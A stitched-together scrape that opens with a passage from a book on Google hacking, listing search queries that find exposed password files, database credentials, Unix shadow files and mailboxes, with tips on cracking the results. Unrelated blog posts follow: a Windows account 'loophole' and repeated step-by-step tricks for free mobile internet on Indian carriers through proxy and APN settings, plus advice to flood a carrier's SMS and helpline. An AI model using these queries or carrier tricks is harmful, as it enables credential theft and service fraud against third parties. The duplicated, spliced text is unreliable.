intitle:”Index of” “.htpasswd” HTTP htpasswd Web user credentials
“htgroup” -intitle:”dist”
-apache -htpasswd.c
intitle:”Index of” “.htpasswd” HTTP htpasswd Web user credentials
htpasswd.bak
“http://*:*@www” bob:bob HTTP passwords (bob is a sample username)
“sets mode: +k” IRC channel keys (passwords)
“Your password is * Remember IRC NickServ registration passwords
this for later use”
signin filetype:url JavaScript authentication credentials
Queries That Locate Password Information
Query Description
LeapFTP intitle:”index.of./” LeapFTP client login credentials
sites.ini modified
inurl:lilo.conf filetype:conf LILO passwords
password -tatercounter2000
-bootpwd –man
filetype:config config intext: Microsoft .NET application credentials
appSettings “User ID”
filetype:pwd service Microsoft FrontPage Service Web passwords
intitle:index.of Microsoft FrontPage Web credentials
administrators.pwd
“# -FrontPage-” inurl:service.pwd Microsoft FrontPage Web passwords
ext:pwd inurl:_vti_pvt inurl: Microsoft FrontPage Web passwords
(Service | authors | administrators)
inurl:perform filetype:ini mIRC nickserv credentials
intitle:”index of” intext: mySQL database credentials
connect.inc
intitle:”index of” intext: mySQL database credentials
globals.inc
filetype:conf oekakibbs Oekakibss user passwords
filetype:dat wand.dat Opera‚ ÄúMagic Wand‚Äù Web credentials
inurl:ospfd.conf intext: OSPF Daemon Passwords
password -sample -test
-tutorial –download
index.of passlist Passlist user credentials
inurl:passlist.txt passlist.txt file user credentials
filetype:dat “password.dat” password.dat files
inurl:password.log filetype:log password.log file reveals usernames, passwords,
and hostnames
filetype:log inurl:”password.log” password.log files cleartext passwords
inurl:people.lst filetype:lst People.lst generic password file
intitle:index.of config.php PHP Configuration File database credentials
inurl:config.php dbuname dbpass PHP Configuration File database credentials
inurl:nuke filetype:sql PHP-Nuke credentials
Queries That Locate Password Information
Query Description
filetype:conf inurl:psybnc.conf psyBNC IRC user credentials
“USER.PASS=”
filetype:ini ServUDaemon servU FTP Daemon credentials
filetype:conf slapd.conf slapd configuration files root password
inurl:”slapd.conf” intext: slapd LDAP credentials
”credentials” -manpage
-”Manual Page” -man: -sample
inurl:”slapd.conf” intext: slapd LDAP root password
”rootpw” -manpage
-”Manual Page” -man: -sample
filetype:sql “IDENTIFIED BY” –cvs SQL passwords
filetype:sql password SQL passwords
filetype:ini wcx_ftp Total Commander FTP passwords
filetype:netrc password UNIX .netrc user credentials
index.of.etc UNIX /etc directories contain various credential
files
intitle:”Index of..etc” passwd UNIX /etc/passwd user credentials
intitle:index.of passwd UNIX /etc/passwd user credentials
passwd.bak
intitle:”Index of” pwd.db UNIX /etc/pwd.db credentials
intitle:Index.of etc shadow UNIX /etc/shadow user credentials
intitle:index.of master.passwd UNIX master.passwd user credentials
intitle:”Index of” spwd.db UNIX spwd.db credentials
passwd -pam.conf
filetype:bak inurl:”htaccess| UNIX various password file backups
passwd|shadow|htusers
filetype:inc dbconn Various database credentials
filetype:inc intext:mysql_ Various database credentials, server names
connect
filetype:properties inurl:db Various database credentials, server names
intext:password
inurl:vtund.conf intext:pass –cvs Virtual Tunnel Daemon passwords
inurl:”wvdial.conf” intext: wdial dialup user credentials
Queries That Locate Password Information
Query Description
filetype:mdb wwforum Web Wiz Forums Web credentials
“AutoCreate=TRUE password=*”Website Access Analyzer user passwords
filetype:pwl pwl Windows Password List user credentials
filetype:reg reg +intext: Windows Registry Keys containing user
”defaultusername” intext: credentials
”defaultpassword”
filetype:reg reg +intext: Windows Registry Keys containing user
”internet account manager” credentials
“index of/” “ws_ftp.ini” WS_FTP FTP credentials
“parent directory”
filetype:ini ws_ftp pwd WS_FTP FTP user credentials
inurl:/wwwboard wwwboard user credentials
In most cases, passwords discovered on the Web are either encrypted or
encoded in some way. In most cases, these passwords can be fed into a password
cracker such as John the Ripper from www.openwall.com/john to produce
plaintext passwords that can be used in an attack. Figure 9.6 shows the results of
the search ext:pwd inurl:_vti_pvt inurl:(Service | authors | administrators), which
combines a search for some common
Exported Windows registry files often contain encrypted or encoded passwords
as well. If a user exports the Windows registry to a file and Google subsequently
crawls that file, a query like filetype:reg intext:”internet account manager”
could reveal interesting keys containing password data
ress. Note that live, exported Windows registry files are not very common, but it’s
not uncommon for an attacker to target a site simply because of one exceptionally
insecure file. It’s also possible for a Google query to uncover cleartext passwords.
These passwords can be used as is without having to employ a
password-cracking utility. In these extreme cases, the only challenge is determining
the username as well as the host on which the password can be used. As
shown in Figure 9.8, certain queries will locate all the following information:
usernames, cleartext passwords, and the host that uses that authentication!
There is no magic query for locating passwords, but during an assessment,
remember that the simplest queries directed at a site can have amazing results, as
we discussed in , Chapter 7, Ten Simple Searches. For example, a query like “Your
password” forgot would locate pages that provide a forgotten password recovery
mechanism.The information from this type of query can be used to formulate
any of a number of attacks against a password. As always, effective social engineering
is a terrific nontechnical solution to “forgotten” passwords.
Another generic search for password information, intext:(password | passcode |
pass) intext:(username | userid | user), combines common words for passwords and
user IDs into one query.This query returns a lot of results, but the vast majority
of the top hits refer to pages that list forgotten password information, including
either links or contact information. Using Google’s translate feature, found at
http://translate.google.com/translate_t, we could also create multilingual password
searches.Table 9.3 lists common translations for the word password
English Translations of the Word Password
Language Word Translation
German password Kennwort
Spanish password contraseña
French password mot de passe
Italian password parola d’accesso
Portuguese password senha
Dutch password Paswoord
NOTE
The terms username and userid in most languages translate to username
and userid, respectively.
Searching for Credit Card Numbers,
Social Security Numbers, and More
Most people have heard news stories about Web hackers making off with customer
credit card information.With so many fly-by night retailers popping up
on the Internet, it’s no wonder that credit card fraud is so prolific.These momand-
pop retailers are not the only ones successfully compromised by hackers.
Corporate giants by the hundreds have had financial database compromises over
the years, victims of sometimes very technical, highly focused attackers. What
might surprise you is that it doesn’t take a rocket scientist to uncover live credit
card numbers on the Internet, thanks to search engines like Google. Everything
from credit information to banking data or supersensitive classified government
documents can be found on the Web. Consider the (highly edited) Web page
This document, found using Google, lists hundreds and hundreds of credit
card numbers (including expiration date and card validation numbers) as well as
the owners’ names, addresses, and phone numbers.This particular document also
included phone card (calling card) numbers. Notice the scroll bar on the righthand
side of Figure 9.9, an indicator that the displayed page is only a small part
of this huge document—like many other documents of its kind. In most cases,
pages that contain these numbers are not “leaked” from online retailers or ecommerce
sites but rather are most likely the fruits of a scam known as phishing,
in which users are solicited via telephone or e-mail for personal information.
Several Web sites, including MillerSmiles.co.uk, document these scams and
hoaxes. Figure 9.10 shows a screen shot of a popular eBay phishing scam that
encourages users to update their eBay profile information.
Once a user fills out this form, all the information is sent via e-mail to the
attacker, who can use it for just about anything.
Tools and Traps
Catching Online Scammers
In some cases, you might be able to use Google to help nab the bad guys.
Phishing scams are effective because the fake page looks like an official
page. To create an official-looking page, the bad guys must have examples
to work from, meaning that they must have visited a few legitimate companies’
Web sites. If the fishing scam was created using text from several
companies’ existing pages, you can key in on specific phrases from the fake
page, creating Google queries designed to round up the servers that hosted
some of the original content. Once you’ve located the servers that contained
the pilfered text, you can work with the companies involved to
extract correlating connection data from their log files. If the scammer visited
each company’s Web page, collecting bits of realistic text, his IP should
appear in each of the log files. Auditors at SensePost (www.sensepost.com)
have successfully used this technique to nab online scam artists.
Unfortunately, if the scammer uses an exact copy of a page from only one
company, this task becomes much more difficult to accomplish.
Social Security Numbers
Social Security numbers (SSNs) and other sensitive data can be easily located
with Google as well as via the same techniques used to locate credit card numbers.
For a variety of reasons, SSNs might appear online—for example, educational
facilities are notorious for using an SSN as a student ID, then posting
grades to a public Web site with the “student ID” displayed next to the grade.A
creative attacker can do quite a bit with just an SSN, but in many cases it helps
to also have a name associated with that SSN. Again, educational facilities have
been found exposing this information via Excel spreadsheets listing student’s
names, grades, and SSNs, despite the fact that the student ID number is often
used to help protect the privacy of the student! Although we don’t feel it’s right
to go into the details of how this data is located, several media outlets have irresponsibly
posted the details online. Although the blame lies with the sites that are
leaking this information, in our opinion it’s still not right to draw attention to
how exactly the information can be located.
Personal Financial Data
In some cases, phishing scams are responsible for publicizing personal information;
in other cases, hackers attacking online retails are to blame for this breach of
privacy. Sadly, there are many instances where an individual is personally responsible
for his own lack of privacy. Such is the case with personal financial information.
With the explosion of personal computers in today’s society, users have
literally hundreds of personal finance programs to choose from. Many of these
programs create data files with specific file extensions that can be searched with
Google. It’s hard to imagine why anyone would post personal financial information
to a public Web site (which subsequently gets crawled by Google), but it
must happen quite a bit, judging by the number of hits for program files generated
by Quicken and Microsoft Money, for example. Although it would be
somewhat irresponsible to provide queries here that would unearth personal
financial data, it’s important to understand the types of data that could potentially
be uncovered by an attacker.To that end,Table 9.4 shows file extensions for various
financial, accounting, and tax return programs. Ensure that these filetypes
aren’t listed on a webserver you’re charged with protecting.
File Extension Description
afm Abassis Finance Manager
ab4 Accounting and Business File
mmw AceMoney File
Iqd AmeriCalc Mutual Fund Tax Report
et2 Electronic Tax Return Security File (Australia)
tax Intuit TurboTax Tax Return
t98-t04 Kiplinger Tax Cut File (extension based on two-digit return
year)
mny Microsoft Money 2004 Money Data Files
mbf Microsoft Money Backup Files
inv MSN Money Investor File
ptdb Peachtree Accounting Database
qbb QuickBooks Backup Files reveal financial data
qdf Quicken personal finance data
soa Sage MAS 90 accounting software
sdb Simply Accounting
stx Simply Tax Form
tmd Time and Expense Tracking
tls Timeless Time & Expense
fec U.S. Federal Campaign Expense Submission
wow Wings Accounting File
Searching for Other Juicy Info
As we’ve seen, Google can be used to locate all sorts of sensitive information. In
this section we take a look at some of the data that Google can find that’s harder
to categorize. From address books to chat log files and network vulnerability
reports, there’s no shortage of sensitive data online.Table 9.5 shows some queries
that can be used to uncover various types of sensitive data.
Query Description
intext:”Session Start AIM and IRC log files
* * * *:*:* *” filetype:log
filetype:blt blt +intext: AIM buddy lists
screenname
buddylist.blt AIM buddy lists
intitle:index.of cgiirc.config CGIIRC (Web-based IRC client) config file,
shows IRC servers and user credentials
inurl:cgiirc.config CGIIRC (Web-based IRC client) config file,
shows IRC servers and user credentials
“Index of” / “chat/logs” Chat logs
intitle:”Index Of” cookies.txt cookies.txt file reveals user information
“size”
“phone * * *” “address *” Curriculum vitae (resumes) reveal names
“e-mail” intitle:”curriculum vitae” and address information
ext:ini intext:env.ini Generic environment data
intitle:index.of inbox Generic mailbox files
“Running in Child mode” Gnutella client data and statistics
“:8080” “:3128” “:80” HTTP Proxy lists
filetype:txt
intitle:”Index of” ICQ chat logs
dbconvert.exe chats
“sets mode: +p” IRC private channel information
“sets mode: +s” IRC secret channel information
“Host Vulnerability Summary ISS vulnerability scanner reports, reveal
Report” potential vulnerabilities on hosts and
networks
“Network Vulnerability ISS vulnerability scanner reports, reveal
Assessment Report” potential vulnerabilities on hosts and networks
filetype:pot inurl:john.pot John the Ripper password cracker results
intitle:”Index Of” -inurl:maillog Maillog files reveals e-mail traffic
maillog size information
ext:mdb inurl:*.mdb inurl: Microsoft FrontPage database folders
Query Description
filetype:xls inurl:contact Microsoft Excel sheets containing contact
information.
intitle:index.of haccess.ctl Microsoft FrontPage equivalent(?)of htaccess
shows Web authentication info
ext:log “Software: Microsoft Microsoft Internet Information Services
Internet Information Services *.*” (IIS) log files
filetype:pst inurl:”outlook.pst” Microsoft Outlook e-mail and calendar
backup files
intitle:index.of mt-db-pass.cgi Movable Type default file
filetype:ctt ctt messenger MSN Messenger contact lists
“This file was generated Nessus vulnerability scanner reports, reveal
by Nessus” potential vulnerabilities on hosts and networks
inurl:”newsletter/admin/” Newsletter administration information
inurl:”newsletter/admin/” Newsletter administration information
intitle:”newsletter admin”
filetype:eml eml intext: Outlook Express e-mail files
”Subject” +From
intitle:index.of inbox dbx Outlook Express Mailbox files
intitle:index.of inbox dbx Outlook Express Mailbox files
filetype:mbx mbx intext:Subject Outlook v1–v4 or Eudora mailbox files
inurl:/public/?Cmd=contents Outlook Web Access public folders or
appointments
filetype:pdb pdb backup (Pilot Palm Pilot Hotsync database files
| Pluckerdb)
“This is a Shareaza Node” Shareaza client data and statistics
inurl:/_layouts/settings Sharepoint configuration information
inurl:ssl.conf filetype:conf SSL configuration files, reveal various configuration
information
site:edu admin grades Student grades
intitle:index.of mystuff.xml Trillian user Web links
inurl:forward filetype: UNIX mail forward files reveal e-mail
forward –cvs addresses
intitle:index.of dead.letter UNIX unfinished e-mails
Summary
Make no mistake—there’s sensitive data on the Web, and Google can find it.
There’s hardly any limit to the scope of information that can be located, if only
you can figure out the right query. From usernames to passwords, credit card and
Social Security numbers, and personal financial information, it’s all out there. As a
purveyor of the “dark arts,” you can relish in the stupidity of others, but as a professional
tasked with securing a customer’s site from this dangerous form of
information leakage, you could be overwhelmed by the sheer scale of your
defensive duties.
As droll as it might sound, a solid, enforced security policy is a great way to
keep sensitive data from leaking to the Web. If users understand the risks associated
with information leakage and understand the penalties that come with violating
policy, they will be more willing to cooperate in what should be a security
partnership.
In the meantime, it certainly doesn’t hurt to understand the tactics an adversary
might employ in attacking a Web server. One thing that should become
clear as you read this book is that any attacker has an overwhelming number of
files to go after. One way to prevent dangerous Web information leakage is by
denying requests for unknown file types. Whether your Web server normally
serves up CFM,ASP, PHP, or HTML, it’s infinitely easier to manage what should
be served by the Web server instead of focusing on what should not be served.
Adjust your servers or your border protection devices to allow only specific content
or file types.
Solutions Fast Track
Searching for Usernames
_ Usernames can be found in a variety of locations.
_ In some cases, digging through documents or e-mail directories might
be required.
_ A simple query such as “your username is” can be very effective in
locating usernames.
Searching for Passwords
_ Passwords can also be found in a variety locations.
_ A query such as “Your password” forgot can locate pages that provide a
forgotten-password recovery mechanism.
_ intext:(password | passcode | pass) intext:(username | userid | user) is
another generic search for locating password information.
Searching for Credit Cards
Numbers, Social Security Numbers, and More
_ Documents containing credit card and Social Security number
information do exist and are relatively prolific.
_ Some irresponsible news outlets have revealed functional queries that
locate this information.
_ There are relatively few examples of personal financial data online, but
there is a great deal of variety.
_ In most cases, specific file extensions can be searched for.
Searching for Other Juicy Info
_ From address books and chat log files to network vulnerability reports,
there’s no shortage of sensitive data online.
Windows Password Loophole
I wish i'd quit finding these !! : Sai Teja
a. ok now, what you need to do is to run compmgmt.mscb. and click on local users and groups.
c. once you've gotten here you need to open up the 'users' folder.
at this point i am walking along with you and notice that there are several
major security holes dealing specifically with the password:
1. double clicking on the any user name allows you a list that looks
something like this:
"user name"
full name: -----------------------
|__________________|
description: -----------------------
|__________________|
--
|_| user must change password at next logon
--
|_| user cannot change password
--
|/| password never expires
--
|_| account is disabled
--
|_| account is locked out
"ok" "cancel" "apply"
ok if you can get past my cheesy drawing, i must ask, did you notice that
the "password never expires" box is checked? if you did, then you may have
realized that this means that you can also uncheck it!
2. if ure paying attention, you'll see that the 'user must change password
at next logon' box is unchecked. if you put a check in this box of course,
when you shut down the system will prompt for a new password!
3. going back to step c.,
right click on any account and notice the dialoge that appears:
set password...
all tasks
delete
rename
properties
help
i think you can handle it from here
ps. i wonder if you can access this data if this stuff is locked to the user
by the admin by going in through the command prompt. i doubt it but if neone
finds a way let me know.
Saturday, November 1, 2008
Idea Hack for free GPRS
This is the new trick for the user of idea cellular.
cell phone or pc/laptop.....
Before starting the detailed procedure these things described as
#1... YOU MUST NOT HAVE CONNECTION !
#2... YOU MUST NOT HAVE ANY ACTIVE PLANS OF GPRS/INTERNET !
#3... YOU MUST HAVE PREPAID CONNECTION !( USING OF THIS TRICK IN
POST PAID WILL LEAD TO YOU HIGHER AMOUNT OF BILL )
#4... YOU MUST HAVE TO USE S60 DEVICES OR HIGHER..NEVER USE THIS
TRICK FOR THE S40 DEVICES(FOR CERTAIN S40 DEVICES THIS TRICK
WORKS)
#5... THIS TRICK HAS BEEN TESTED SUCCESSFULLY IN NOKIA AND SONY
ERICSSON DEVICES !
NOW COME TO THE PROCEDURE TO GET FREE INTERNET:
From your idea cell phone type GP13 and send it to 4444.
now you will receive that your GP13 pack will be activated within
24 hours...
now wait for 12 to 16 hours..
now send the same sms to 4444..
you will receive that your request has been already registered.
now again after 24 hours you will find that your GP13 pack has
been activated...!!!
BUT thats not a trick...yes because you have been have been
charged 13 rs because of activation of GP13..
real trick starts now..
After successfull activation of GP13 pack just send NOGP13 to
4444.(4444 No is free of charge)
you will receive that your GP13 pack will be deactivated within
24 hours..
now after just 10 to 12 hours of sending dectivation sms again
send GP13 to 4444..
now its enough ...you have completed your all steps to get free
internet..
its because due to last activation sms after deactivation sms
system will be hacked!!!System isnt able to take decision what to
do!!
now after some time of sending sms for activation just reboot
your system from file explorer..
now restart your device/cell..you are able to surf free..
but note that if you are using cell phone than use opera mini or
uc web browser and if you are using pc/laptop than use smart web
browser or opera 9.27.
if you wish to use proxy for your opera than you must have to use
the proxy given below.....
1.
i.p.Adderss: 12.148.192.178
Port :1080(common for all)
2.
i.p.Adderss: 63.127.192.178
3.
i.p.Adderss: 199.105.112.152
4.
i.p.Adderss: 199.105.112.163
5.
i.p.Adderss: 12.148.162.37.......
cell phone or pc/laptop.....
Before starting the detailed procedure these things described as
#1... YOU MUST NOT HAVE CONNECTION !
#2... YOU MUST NOT HAVE ANY ACTIVE PLANS OF GPRS/INTERNET !
#3... YOU MUST HAVE PREPAID CONNECTION !( USING OF THIS TRICK IN
POST PAID WILL LEAD TO YOU HIGHER AMOUNT OF BILL )
#4... YOU MUST HAVE TO USE S60 DEVICES OR HIGHER..NEVER USE THIS
TRICK FOR THE S40 DEVICES(FOR CERTAIN S40 DEVICES THIS TRICK
WORKS)
#5... THIS TRICK HAS BEEN TESTED SUCCESSFULLY IN NOKIA AND SONY
ERICSSON DEVICES !
NOW COME TO THE PROCEDURE TO GET FREE INTERNET:
From your idea cell phone type GP13 and send it to 4444.
now you will receive that your GP13 pack will be activated within
24 hours...
now wait for 12 to 16 hours..
now send the same sms to 4444..
you will receive that your request has been already registered.
now again after 24 hours you will find that your GP13 pack has
been activated...!!!
BUT thats not a trick...yes because you have been have been
charged 13 rs because of activation of GP13..
real trick starts now..
After successfull activation of GP13 pack just send NOGP13 to
4444.(4444 No is free of charge)
you will receive that your GP13 pack will be deactivated within
24 hours..
now after just 10 to 12 hours of sending dectivation sms again
send GP13 to 4444..
now its enough ...you have completed your all steps to get free
internet..
its because due to last activation sms after deactivation sms
system will be hacked!!!System isnt able to take decision what to
do!!
now after some time of sending sms for activation just reboot
your system from file explorer..
now restart your device/cell..you are able to surf free..
but note that if you are using cell phone than use opera mini or
uc web browser and if you are using pc/laptop than use smart web
browser or opera 9.27.
if you wish to use proxy for your opera than you must have to use
the proxy given below.....
1.
i.p.Adderss: 12.148.192.178
Port :1080(common for all)
2.
i.p.Adderss: 63.127.192.178
3.
i.p.Adderss: 199.105.112.152
4.
i.p.Adderss: 199.105.112.163
5.
i.p.Adderss: 12.148.162.37.......
BSNL hack for free Internet
here are the steps to perform:-
Logic: the server has a major bug in it, by which it fails to block two simultaneous connections from the phone and establishes a connection with full internet working,
Supported devices: all phones with multichannel gprs support
For connection on your mobile phone:-
1) Make two connections like bsnlportal and BSNLPORTAL1
(names of profile don’t matter, u can keep one as billgates and shahrukhkhan lol..the basic purpose of names is to enable the user to differentiate between the two accounts,)
2) Select the application you got to have the full connection working on.
Surpassingly “web” now just select “bsnlportal” profile and select a link like wap.cellone.in the page will get open, just press the red button such that the “web” application goes in the background.
Make sure that the gprs connection is still established with the web app. Two parallel lines on the top left of the screen will confirm this
3) Now open any other app that requires web connection like opera. Select BSNLPORTAL and open any other link like wap.google.com, u will get error –
the aim of using the other app is to perform multi-channel gprs,
this is verified by seeing some dots on the pre-existing connection established by “web”
(step 2)
“Access denied.
Technical description:
403 Forbidden - You are not allowed to communicate with the requested resource.”
4) close opera and open web and open a site like esato.com
5) if everything is done as said here then esato will load and voila! We have the whole internet!
For connection on pc.
1)create a connection and enter the number to be dialed as *99***1#
2) enter the following string as extra initialization command
3)now dial from pc, the connection will be established
4)pick the phone and open “web” open “wap.cellone.in” the phone shows error .
5) close “web” and then from the browser open www.google.com
and voila! The whole intenet is here
settings for profiles
apn: celloneportal
ip: 192.168.51.163
port : 8080
leave other fields blank as they are of the least concern!
the browser settings on pc too go the same as mentioned above!
Logic: the server has a major bug in it, by which it fails to block two simultaneous connections from the phone and establishes a connection with full internet working,
Supported devices: all phones with multichannel gprs support
For connection on your mobile phone:-
1) Make two connections like bsnlportal and BSNLPORTAL1
(names of profile don’t matter, u can keep one as billgates and shahrukhkhan lol..the basic purpose of names is to enable the user to differentiate between the two accounts,)
2) Select the application you got to have the full connection working on.
Surpassingly “web” now just select “bsnlportal” profile and select a link like wap.cellone.in the page will get open, just press the red button such that the “web” application goes in the background.
Make sure that the gprs connection is still established with the web app. Two parallel lines on the top left of the screen will confirm this
3) Now open any other app that requires web connection like opera. Select BSNLPORTAL and open any other link like wap.google.com, u will get error –
the aim of using the other app is to perform multi-channel gprs,
this is verified by seeing some dots on the pre-existing connection established by “web”
(step 2)
“Access denied.
Technical description:
403 Forbidden - You are not allowed to communicate with the requested resource.”
4) close opera and open web and open a site like esato.com
5) if everything is done as said here then esato will load and voila! We have the whole internet!
For connection on pc.
1)create a connection and enter the number to be dialed as *99***1#
2) enter the following string as extra initialization command
3)now dial from pc, the connection will be established
4)pick the phone and open “web” open “wap.cellone.in” the phone shows error .
5) close “web” and then from the browser open www.google.com
and voila! The whole intenet is here
settings for profiles
apn: celloneportal
ip: 192.168.51.163
port : 8080
leave other fields blank as they are of the least concern!
the browser settings on pc too go the same as mentioned above!
Airtel Hack for free internet
one
~cheers~
You need a PC or a Laptop and required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle
1) Activate Airtel Live! ( It's FREE so no probs)
2) Create TWO Airtel gprs data accounts (yep TWO)
and select the FIRST as the active profile.
3) Connect your mobile to the PC or Laptop and
install the driver for your mobile's modem
4) Create a new dial-up connection using the
NEW CONNECTION WIZARD as follows
Connecting Device :Your's mobile's modem
ISP name : Airtel (or whatever you like)
Phone number :*99***2# / or try 99***1
Username and Password : Blank
5) Configure your browser and download manager to use the
proxy 100.1.200.99 and port 8080.9
My advice is to use opera since you can browse
both wap and regular websites)
6) Connect the dial-up account.You will be connected
at 115.2 kbps (but remember it is bad joke).
7) Pick up your mobile and try to access any site and try to
access any site.You'll get "Access Denied......"(except for Airtel Live!).
IT DOES NOT MATTER.keep the mobile down.
8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER and…….WAIT
9) After a few seconds the page will start to load and you have the
WHOLE internet at your disposal. ***************************************************************************************************************
TWO
Under DATA COMM
~~~~~~~~~~~~
APN : airtelfun.com
USERNAME : blank
PASSWORD : blank
PASS REQ : OFF
ALLOW CALLS : AUTOMATIC
IPADDRESS :
DNSADDRESS :
DATA COMP : OFF
HEADER COMP : OFF
Under INTERNET PROFILES
~~~~~~~~~~~~~~~~
INTERNET MODE : HTTP or WAP (both worked for me)
USE PROXY : YES
IP ADDRESS : 100.1.200.99
PORT : 8080
USERNAME :
PASSWORD :
No Risk Here, Try it and Enjoy
Three
1st go to settings menu then to connectivity tab now choose the option Data comm. then "DATA ACCOUNTS" go to new account now the settings r as follows
ACCOUNT TYPE:GPRS
NEW ACCOUNT NAME:A1
APN:airtelfun.com
usr name: (blank)
password: (blank)
now save it
NOW!
go to Internet Setting in connectivity here choose intrnet profile--go to new profile setting are as below
NAME:A1
CONNECT USING:A1(which was created in data comm.)
save it
now u would be able to see it now selest it and take "more" option then select setting here in use proxy option it will be selected no if it is no then change it into yes
now go to proxy adress and give the adress as
100.1.200.99 and then the port number as 8080
Usr name:
password:
now save all the settings u made . come back 2 connectivity
choose streaming settings now in connect using option choose a1 that we created leave the use proxy option as no itself
THESE R THE SETTINGS
now access airtellive! from ur activated SE phone goto VIDEO GALLERY OR VIDEO UNLIMITED(varies according to states) choose live streaming then choose CNBC OR AAJTAK WHILE CONNECTING TO MEDIA SERVER cancel AFTER 9 or 10 sec then type any web adress if it shows access denied then once again select CNBC and wait for a few more sec than before if its fully connected also no prob its free then cancel it or if ur connected then stop it and the internet is ready to take of .GOOD LUCK SE AIRTEL USERS
alternate
For All Airtel Users
Requirements:
1. Airtel live (available 4 free)
2. Nokia series60 handset eg 6600,6630,n series,7610,6670 etc
3. Opera wap browser 4 mobile
Procedure:-
1. Go to ur connection settings and make a new internet profile using the default settings of airtel live. name that new profile as nething(for eg masala); change the home page of that profile to nething u like for eg www.google.com.
2. Go to ur Opera browser and set the default connection as AIRTEL LIVE. this is the original settings u received thru airtel.
3. Go to the services(in n6600) and Web(N6630) and change the default profile for connection as masala (newer one).
**Note: always make sure that ur access point is airtelfun.com
Apply:-
1. Open Opera and u will see that homepage of Airtel Live is opened. Minimize the application.
2. Now open web using the duplicate Profile and u will see that two gprs connections will work simultaneously and at the web or the services page it will show "Unable to connect" or any error. well thats the signal of ur success.
3. Simply go on the Opera with web on and open any site u want for free. No Charges No nothing.
U can also use it through ur computer..........
someone said dis too
The main principle behind this is we hav 2 fool the bsnl techies 2 activate portal and thus get gprs activated / get "G" signal on ur cell as bsnl portal (wap.cellone.in) needs "gprs signal on ur cel (whether gprs is formaly activated/registerd or not (by my method )i dont know)
NORMALLY THEY DONT DO THAT INSPITE OF THE FACT THAT THEY SHOULD ACTIVATE GPRS SIGNAL SERVICE FOR PORTAL!!!
AND THEY WILL GIVE U NO OF REASONS----
---THAT portal is message based , so go to cellone icon in menu and use that sms based portal (what the f**k)
---THAT portal service will be activated when u will activate gprs by filling up form and registering at nearest CCN!!
---THAT ur handset has some problems (if u say that "G" signal is not present)
----etc,etc!!
U HAVE 2 ACTIVATE PORTAL FIRST WHICH IS FREE AND U CAN EAT UP CC'S FOR THIS REASON!!
SO WHAT U HAV 2 DO IS--
1) SEND PORTAL to 3733 AND CONFIRMATION SHD COME WITH 5 MIN AT-MAXIMM !!
2) SEND FOR ATLEAST 20-30 TIMES (CAN B ANY MORE THAN THAT)
JUST S**K UP THE NETWORK(3733) WITH THESE MESSAGES !!!
THAT'S FREE NO!! BOTH ON POST AND PRE!!
3) NOW ALONG ALSO SEND 20-40 SMS AS GPRS TO 3733
(NO OF SMS DIRECTLY PROPORTIONAL 2 HATE FOR BSNL AND HOW EARLY U WNAN GET UR GPRS ACTIVATED) this is also free both on post and pre!!
4) U WILL GET CONFIRMATION IN BOTH CASES AND MSG TELLS U 2 GET SETTINGS FROM 9400024365, THE NO OF CC!!
HERE AT MY PLACE I CAN DIAL 9419024365 ALSO!
BOTH R TOLL FREE AND BOTH R LOCATED IN CHANDIGARH!!!
(((((((AND SOME OF THE CC'S SAY they cant give such sensitive information that where they r located, as if thay have a 3 rd world of their own! and the other dumbs said that they r in chandigarh!!!!)))))
I WOULD ADVISE ALL FIRST, 2 call them once 2 get the settings!!
(most of the times that is incorect but gives u an idea of settings in ur area))
Try and in ur 1 st call only,
talk roughly and tell them u r calling 10-20th time just for settings and is that their service!!!
5) Now when u get them save them AND plz post them here!!!
6) now GET ATLEAST 2-3 COMPLAINTS REGISTERED( each after 1 day) THAT UR PORTAL HAS NOT ACTIVATED AND GET THEIR SERIAL NO.
and in the end bombard them abt the status of all those complaints !!
b4 registering ur complaint they will hesitate much and always say taht they will b sendin new settings which r accurate! but dont belive them and just register complaints!!
6)AFTER THAT, u have 2 only wait until "G" signal is there on ur screen!!
LOOK, WHAT I HAVE WRIITEN ABV IS METHOD by which i got activated my "G" service !!! without fillin any form or such and without any money drain!!
may be since it bypasses the formal way of registeration, that is why this trick is working !!!!!!!!!!!!
U may also Try this
first open ur msg window and type LIVE and send it to 2567 so that after 5 min u get the setting of Airtel Live or if u have already no need for this procedure.
now then open that setting and copy all the settings from it and create one access point manually which has all the settings like Airtel Live has.
now only one change will be there and it would be in access point name which is "Airtelmms.com" instead of originally "Airtelgprs.com".
ok u've done it just active that setting and access free airtel gprs on ur phone.
~cheers~
You need a PC or a Laptop and required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle
1) Activate Airtel Live! ( It's FREE so no probs)
2) Create TWO Airtel gprs data accounts (yep TWO)
and select the FIRST as the active profile.
3) Connect your mobile to the PC or Laptop and
install the driver for your mobile's modem
4) Create a new dial-up connection using the
NEW CONNECTION WIZARD as follows
Connecting Device :Your's mobile's modem
ISP name : Airtel (or whatever you like)
Phone number :*99***2# / or try 99***1
Username and Password : Blank
5) Configure your browser and download manager to use the
proxy 100.1.200.99 and port 8080.9
My advice is to use opera since you can browse
both wap and regular websites)
6) Connect the dial-up account.You will be connected
at 115.2 kbps (but remember it is bad joke).
7) Pick up your mobile and try to access any site and try to
access any site.You'll get "Access Denied......"(except for Airtel Live!).
IT DOES NOT MATTER.keep the mobile down.
8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER and…….WAIT
9) After a few seconds the page will start to load and you have the
WHOLE internet at your disposal. ***************************************************************************************************************
TWO
Under DATA COMM
~~~~~~~~~~~~
APN : airtelfun.com
USERNAME : blank
PASSWORD : blank
PASS REQ : OFF
ALLOW CALLS : AUTOMATIC
IPADDRESS :
DNSADDRESS :
DATA COMP : OFF
HEADER COMP : OFF
Under INTERNET PROFILES
~~~~~~~~~~~~~~~~
INTERNET MODE : HTTP or WAP (both worked for me)
USE PROXY : YES
IP ADDRESS : 100.1.200.99
PORT : 8080
USERNAME :
PASSWORD :
No Risk Here, Try it and Enjoy
Three
1st go to settings menu then to connectivity tab now choose the option Data comm. then "DATA ACCOUNTS" go to new account now the settings r as follows
ACCOUNT TYPE:GPRS
NEW ACCOUNT NAME:A1
APN:airtelfun.com
usr name: (blank)
password: (blank)
now save it
NOW!
go to Internet Setting in connectivity here choose intrnet profile--go to new profile setting are as below
NAME:A1
CONNECT USING:A1(which was created in data comm.)
save it
now u would be able to see it now selest it and take "more" option then select setting here in use proxy option it will be selected no if it is no then change it into yes
now go to proxy adress and give the adress as
100.1.200.99 and then the port number as 8080
Usr name:
password:
now save all the settings u made . come back 2 connectivity
choose streaming settings now in connect using option choose a1 that we created leave the use proxy option as no itself
